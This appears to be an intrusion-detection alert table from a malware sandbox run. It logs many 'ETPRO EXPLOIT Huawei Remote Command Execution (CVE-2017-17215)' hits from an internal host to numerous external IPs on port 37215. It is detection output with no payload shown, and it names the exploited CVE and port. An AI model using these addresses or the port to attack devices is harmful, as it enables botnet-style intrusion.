                                                    07/10/24-08:27:19.286417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671237215192.168.2.14157.223.121.174
                                                    07/10/24-08:26:36.394343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567237215192.168.2.14197.36.215.39
                                                    07/10/24-08:26:55.421781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860637215192.168.2.1441.23.198.61
                                                    07/10/24-08:26:57.530993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685437215192.168.2.14197.235.4.122
                                                    07/10/24-08:27:11.538749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3745037215192.168.2.14157.83.36.160
                                                    07/10/24-08:26:33.259774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565037215192.168.2.14157.47.144.216
                                                    07/10/24-08:26:53.189669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664437215192.168.2.14197.254.74.225
                                                    07/10/24-08:27:03.007894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630037215192.168.2.14126.43.26.137
                                                    07/10/24-08:26:23.328936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176837215192.168.2.14197.135.20.169
                                                    07/10/24-08:26:59.657885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878037215192.168.2.14120.1.23.105
                                                    07/10/24-08:27:11.545525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484037215192.168.2.1441.129.176.19
                                                    07/10/24-08:27:19.289201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5796037215192.168.2.14157.223.13.108
                                                    07/10/24-08:26:43.664529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3895437215192.168.2.14197.210.5.129
                                                    07/10/24-08:26:20.090184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763037215192.168.2.14157.126.67.151
                                                    07/10/24-08:27:27.147329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575437215192.168.2.14197.130.102.70
                                                    07/10/24-08:26:11.149961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751237215192.168.2.1495.129.116.158
                                                    07/10/24-08:26:43.613127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410437215192.168.2.14126.220.17.127
                                                    07/10/24-08:26:47.860758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5115637215192.168.2.14157.176.144.28
                                                    07/10/24-08:26:55.398753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596037215192.168.2.14129.107.191.14
                                                    07/10/24-08:26:41.400460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331437215192.168.2.14197.140.152.36
                                                    07/10/24-08:27:14.853963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469837215192.168.2.14197.103.15.202
                                                    07/10/24-08:27:10.617808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176637215192.168.2.14197.70.85.7
                                                    07/10/24-08:26:38.655594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240437215192.168.2.14197.177.102.246
                                                    07/10/24-08:27:20.494991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839237215192.168.2.14201.103.175.167
                                                    07/10/24-08:27:08.389862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063637215192.168.2.14197.144.85.68
                                                    07/10/24-08:26:41.351046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894637215192.168.2.14197.89.245.197
                                                    07/10/24-08:27:23.832820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4448837215192.168.2.14197.83.108.136
                                                    07/10/24-08:26:22.216208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426037215192.168.2.14157.41.14.248
                                                    07/10/24-08:26:26.603545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841637215192.168.2.14197.208.112.192
                                                    07/10/24-08:27:34.127270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580237215192.168.2.14197.47.139.208
                                                    07/10/24-08:27:24.975422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5632637215192.168.2.14207.166.50.75
                                                    07/10/24-08:26:17.961786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388437215192.168.2.14197.174.136.210
                                                    07/10/24-08:26:22.281648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628437215192.168.2.14197.140.7.174
                                                    07/10/24-08:26:34.208952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132037215192.168.2.14197.129.81.99
                                                    07/10/24-08:26:28.850187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677037215192.168.2.14157.64.88.246
                                                    07/10/24-08:27:02.843414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055637215192.168.2.141.123.215.255
                                                    07/10/24-08:27:30.444782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135837215192.168.2.14108.65.105.59
                                                    07/10/24-08:26:22.262926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944237215192.168.2.14197.99.141.90
                                                    07/10/24-08:27:02.974934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519237215192.168.2.14157.184.65.241
                                                    07/10/24-08:26:33.161951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732637215192.168.2.14157.142.225.211
                                                    07/10/24-08:26:26.561697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959637215192.168.2.14149.163.25.98
                                                    07/10/24-08:26:28.776935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747837215192.168.2.1438.83.169.248
                                                    07/10/24-08:27:32.595538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339437215192.168.2.1441.96.246.166
                                                    07/10/24-08:26:26.597070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021437215192.168.2.14197.92.237.195
                                                    07/10/24-08:26:20.149592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871437215192.168.2.1441.199.85.19
                                                    07/10/24-08:27:02.993548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472037215192.168.2.1499.251.221.108
                                                    07/10/24-08:26:52.002516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512437215192.168.2.1441.58.103.146
                                                    07/10/24-08:26:11.614233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473437215192.168.2.14169.111.140.146
                                                    07/10/24-08:26:59.870602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994437215192.168.2.14103.196.132.163
                                                    07/10/24-08:26:43.875784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311037215192.168.2.14197.43.249.124
                                                    07/10/24-08:27:02.847593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292837215192.168.2.1432.231.119.42
                                                    07/10/24-08:27:22.845184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773237215192.168.2.14197.173.29.247
                                                    07/10/24-08:26:51.957475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093837215192.168.2.1459.19.127.100
                                                    07/10/24-08:26:17.994829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517837215192.168.2.14197.169.14.145
                                                    07/10/24-08:26:13.836737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149037215192.168.2.1441.170.153.138
                                                    07/10/24-08:26:59.847925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4428437215192.168.2.14211.72.160.230
                                                    07/10/24-08:26:47.773656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361837215192.168.2.144.178.184.172
                                                    07/10/24-08:26:47.979211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233237215192.168.2.14157.226.160.152
                                                    07/10/24-08:27:22.838932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648237215192.168.2.14176.131.231.150
                                                    07/10/24-08:27:23.932047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163237215192.168.2.1441.183.215.157
                                                    07/10/24-08:26:43.888135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300637215192.168.2.1439.28.44.113
                                                    07/10/24-08:26:55.330413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064037215192.168.2.1441.248.76.204
                                                    07/10/24-08:26:18.003273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620437215192.168.2.1441.174.25.12
                                                    07/10/24-08:26:22.222515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677837215192.168.2.14157.91.170.187
                                                    07/10/24-08:26:28.758011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317837215192.168.2.1491.57.88.109
                                                    07/10/24-08:26:43.524057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874637215192.168.2.14157.75.66.86
                                                    07/10/24-08:27:22.923054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375437215192.168.2.1473.79.226.164
                                                    07/10/24-08:26:55.385605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5225037215192.168.2.14157.112.33.15
                                                    07/10/24-08:26:48.708629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511637215192.168.2.14197.217.183.84
                                                    07/10/24-08:27:17.017003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400637215192.168.2.1441.140.59.155
                                                    07/10/24-08:26:28.650487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934437215192.168.2.14197.31.224.73
                                                    07/10/24-08:26:28.896457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970437215192.168.2.14197.134.213.78
                                                    07/10/24-08:27:13.915007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360037215192.168.2.14197.215.134.197
                                                    07/10/24-08:27:03.030888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452837215192.168.2.14197.182.227.31
                                                    07/10/24-08:27:14.875220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531837215192.168.2.14197.118.210.128
                                                    07/10/24-08:26:25.454696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673637215192.168.2.14157.149.67.70
                                                    07/10/24-08:27:14.834024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682837215192.168.2.1472.245.38.83
                                                    07/10/24-08:27:03.016344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728637215192.168.2.1441.163.47.203
                                                    07/10/24-08:26:42.341991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637637215192.168.2.14157.78.86.190
                                                    07/10/24-08:27:23.923569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034437215192.168.2.14157.254.75.210
                                                    07/10/24-08:26:13.785071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678637215192.168.2.14142.36.169.221
                                                    07/10/24-08:26:41.517379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457637215192.168.2.14197.80.254.135
                                                    07/10/24-08:27:24.993210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357437215192.168.2.1418.180.247.13
                                                    07/10/24-08:26:28.798485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894037215192.168.2.14197.0.220.127
                                                    07/10/24-08:26:41.499571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680437215192.168.2.14157.181.22.201
                                                    07/10/24-08:26:14.808905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975037215192.168.2.14197.105.243.227
                                                    07/10/24-08:27:30.516859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026437215192.168.2.14197.220.116.86
                                                    07/10/24-08:27:34.136895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709237215192.168.2.1441.200.23.38
                                                    07/10/24-08:26:47.889054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813637215192.168.2.1468.7.174.182
                                                    07/10/24-08:26:55.444062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070837215192.168.2.14157.162.81.184
                                                    07/10/24-08:26:38.638682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964637215192.168.2.1441.33.43.133
                                                    07/10/24-08:26:47.854499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795237215192.168.2.14167.2.232.48
                                                    07/10/24-08:27:22.539034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030037215192.168.2.14157.148.33.97
                                                    07/10/24-08:26:41.449225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808237215192.168.2.14157.90.230.165
                                                    07/10/24-08:27:10.591175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253837215192.168.2.14145.21.255.28
                                                    07/10/24-08:27:08.366132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883237215192.168.2.14157.177.55.159
                                                    07/10/24-08:27:13.967475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925837215192.168.2.14197.105.91.138
                                                    07/10/24-08:26:42.177272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853637215192.168.2.1441.176.37.62
                                                    07/10/24-08:26:22.231914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468837215192.168.2.1441.33.30.179
                                                    07/10/24-08:27:08.425890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319037215192.168.2.14197.71.20.28
                                                    07/10/24-08:26:28.637197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3609437215192.168.2.14157.53.198.183
                                                    07/10/24-08:26:59.797297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957637215192.168.2.1466.166.2.77
                                                    07/10/24-08:27:02.825346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371837215192.168.2.1441.3.222.217
                                                    07/10/24-08:27:05.108007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797637215192.168.2.14157.19.132.22
                                                    07/10/24-08:27:05.158700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848637215192.168.2.14197.202.170.144
                                                    07/10/24-08:27:11.489140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946237215192.168.2.14197.187.132.161
                                                    07/10/24-08:27:23.948745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902037215192.168.2.14157.154.171.217
                                                    07/10/24-08:27:17.020582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4107437215192.168.2.14161.102.27.73
                                                    07/10/24-08:27:19.307932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375437215192.168.2.14197.163.243.229
                                                    07/10/24-08:26:57.628977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636037215192.168.2.14157.245.171.143
                                                    07/10/24-08:27:30.560872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220037215192.168.2.14174.14.137.26
                                                    07/10/24-08:26:28.927122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268237215192.168.2.14197.22.12.249
                                                    07/10/24-08:26:28.937800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939437215192.168.2.1441.70.242.214
                                                    07/10/24-08:26:33.243364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331437215192.168.2.1441.2.220.176
                                                    07/10/24-08:26:57.525834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4712837215192.168.2.14167.213.133.214
                                                    07/10/24-08:27:22.939147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135637215192.168.2.1441.193.142.135
                                                    07/10/24-08:27:10.547644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499637215192.168.2.1418.168.73.181
                                                    07/10/24-08:27:13.815716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396437215192.168.2.14197.27.43.224
                                                    07/10/24-08:26:42.359553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660437215192.168.2.14157.99.100.170
                                                    07/10/24-08:27:02.706462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364637215192.168.2.1441.19.149.4
                                                    07/10/24-08:26:13.753086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944037215192.168.2.14157.116.198.66
                                                    07/10/24-08:26:49.832031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6053437215192.168.2.14126.217.143.82
                                                    07/10/24-08:26:18.018737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057437215192.168.2.1454.31.206.163
                                                    07/10/24-08:27:11.529437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865637215192.168.2.14157.155.81.31
                                                    07/10/24-08:27:13.980832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348037215192.168.2.14197.212.32.20
                                                    07/10/24-08:26:17.958835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527837215192.168.2.1482.38.152.143
                                                    07/10/24-08:26:25.445114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4421637215192.168.2.1441.38.75.23
                                                    07/10/24-08:27:22.909155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505237215192.168.2.1441.60.77.203
                                                    07/10/24-08:27:20.437180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790437215192.168.2.14157.25.200.19
                                                    07/10/24-08:27:30.444942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521037215192.168.2.1441.130.17.136
                                                    07/10/24-08:26:13.647460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129837215192.168.2.1443.6.191.125
                                                    07/10/24-08:26:23.333013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503437215192.168.2.14197.224.165.89
                                                    07/10/24-08:26:43.779855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564637215192.168.2.14157.199.222.123
                                                    07/10/24-08:26:29.752845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834037215192.168.2.14197.40.111.180
                                                    07/10/24-08:27:27.168344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241837215192.168.2.14197.69.41.83
                                                    07/10/24-08:27:36.285342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563437215192.168.2.14197.161.103.174
                                                    07/10/24-08:26:38.645835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311037215192.168.2.14203.150.45.30
                                                    07/10/24-08:26:45.656574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864437215192.168.2.14153.171.47.163
                                                    07/10/24-08:27:22.539034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369037215192.168.2.14120.20.39.179
                                                    07/10/24-08:27:23.782637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003637215192.168.2.1441.182.189.98
                                                    07/10/24-08:26:45.604198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946837215192.168.2.14157.13.153.56
                                                    07/10/24-08:27:33.852239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118437215192.168.2.14197.153.9.193
                                                    07/10/24-08:26:20.108378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5506037215192.168.2.14197.11.124.60
                                                    07/10/24-08:26:20.189535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191437215192.168.2.1480.53.145.190
                                                    07/10/24-08:27:05.101727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627437215192.168.2.1463.32.82.61
                                                    07/10/24-08:26:41.311448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4404037215192.168.2.14197.208.97.99
                                                    07/10/24-08:26:20.188191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931237215192.168.2.1441.192.168.60
                                                    07/10/24-08:26:59.566054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041037215192.168.2.1441.147.233.150
                                                    07/10/24-08:26:29.837168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080837215192.168.2.14197.51.213.3
                                                    07/10/24-08:26:18.008583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733437215192.168.2.1445.148.71.173
                                                    07/10/24-08:26:36.322719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813437215192.168.2.1441.46.28.159
                                                    07/10/24-08:26:28.723729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797037215192.168.2.14106.115.105.197
                                                    07/10/24-08:26:34.212749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4672837215192.168.2.14200.253.44.165
                                                    07/10/24-08:26:43.861688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728437215192.168.2.14162.158.71.127
                                                    07/10/24-08:27:17.070374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873237215192.168.2.14197.30.227.162
                                                    07/10/24-08:27:08.323011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961837215192.168.2.1414.111.101.41
                                                    07/10/24-08:26:43.848848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785437215192.168.2.14157.114.175.151
                                                    07/10/24-08:26:11.525491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168037215192.168.2.14197.26.218.26
                                                    07/10/24-08:26:26.563036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614437215192.168.2.14223.246.69.216
                                                    07/10/24-08:27:33.865886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841237215192.168.2.1441.241.231.96
                                                    07/10/24-08:26:59.852225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491637215192.168.2.14197.206.187.169
                                                    07/10/24-08:27:08.441013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074637215192.168.2.14157.40.32.152
                                                    07/10/24-08:27:22.879790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728637215192.168.2.14157.165.64.182
                                                    07/10/24-08:27:08.412825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5569437215192.168.2.1441.107.53.234
                                                    07/10/24-08:26:26.583934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432437215192.168.2.1441.75.21.154
                                                    07/10/24-08:27:27.174568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261037215192.168.2.1441.110.136.191
                                                    07/10/24-08:27:30.489960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184037215192.168.2.1441.158.78.222
                                                    07/10/24-08:26:29.789331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545237215192.168.2.14197.165.110.68
                                                    07/10/24-08:26:36.394343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296837215192.168.2.14157.233.153.171
                                                    07/10/24-08:26:43.655824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339637215192.168.2.1441.110.120.130
                                                    07/10/24-08:26:43.737696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724437215192.168.2.1451.10.176.15
                                                    07/10/24-08:26:31.094211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482837215192.168.2.14136.225.208.138
                                                    07/10/24-08:26:43.929800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817437215192.168.2.14197.119.213.69
                                                    07/10/24-08:27:02.853757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3758437215192.168.2.14157.249.168.92
                                                    07/10/24-08:26:43.825579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545837215192.168.2.1441.24.7.238
                                                    07/10/24-08:26:43.722420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073237215192.168.2.14197.110.70.186
                                                    07/10/24-08:26:26.483995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911437215192.168.2.14197.184.243.242
                                                    07/10/24-08:26:29.797142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786037215192.168.2.14113.238.180.164
                                                    07/10/24-08:26:52.004457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523237215192.168.2.14197.186.192.98
                                                    07/10/24-08:26:59.751989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233837215192.168.2.14176.204.172.91
                                                    07/10/24-08:26:26.587829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511437215192.168.2.1441.168.120.151
                                                    07/10/24-08:26:15.867590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681037215192.168.2.14157.212.230.10
                                                    07/10/24-08:26:20.133795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683037215192.168.2.14157.91.222.23
                                                    07/10/24-08:26:59.577459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630037215192.168.2.1441.91.252.124
                                                    07/10/24-08:27:30.542480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072437215192.168.2.14136.178.135.153
                                                    07/10/24-08:26:25.467971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553237215192.168.2.14128.238.85.227
